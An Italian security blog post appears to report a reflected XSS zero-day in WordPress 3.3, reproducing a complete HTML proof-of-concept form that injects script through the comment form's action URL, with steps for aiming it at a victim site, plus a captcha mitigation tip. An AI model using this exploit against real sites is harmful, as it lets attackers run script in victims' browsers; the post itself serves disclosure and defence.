Home » Sicurezza » WordPress 3.3, 0-day Reflected XSS Vulnerability

WordPress 3.3, 0-day Reflected XSS Vulnerability

A pochi giorni dal rilascio della nuova versione di WordPress, la 3.3, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti.

Praticamente per eseguire l’exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima.

Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.

<html>
<title>Wordpress 3.3 XSS PoC</title>
<body>
<form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me"/>
<input type="hidden" name="email" value="replace me"/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="comment" value="replace me"/>
<input type="hidden" name="submit" value="Post Comment"/>
<input type="hidden" name="comment_post_ID" value="replace me"/>
<input type="hidden" name="comment_parent" value="0"/>
<input type="button" value="Click Me" />
</style></form>
</body>
</html>

Al posto di “replace me” vanno inseriti gli stessi dati usati nel precedente commento e al posto di “http://192.168.1.102/wordpress/” va inserito il riferimento del sito vittima.

A questo punto basterà cliccare sul tasto “Click me” e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel “form action” della nostra pagina verrà eseguito.

Nell’esempio il codice Javascript da eseguire era il seguente:

<script>document.write(Date())</script>

che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,viene correttamenete eseguito dimostrando la vulnerabilità XSS.

In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.

Link di riferimento

Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 – The Hackers News
Sorgenti Pastebin.com

 

Ti è stato utile? Votalo!
[Voti: 0    Media Voto: 0/5]
  • Pingback: Alex745()

Altro... cross site scripting, vulnerabilità wordpress, wordpress 0-day, wordpress 3.3, wordpress exploit, wordpress vulnerability, wordpress zero-day
Chiudi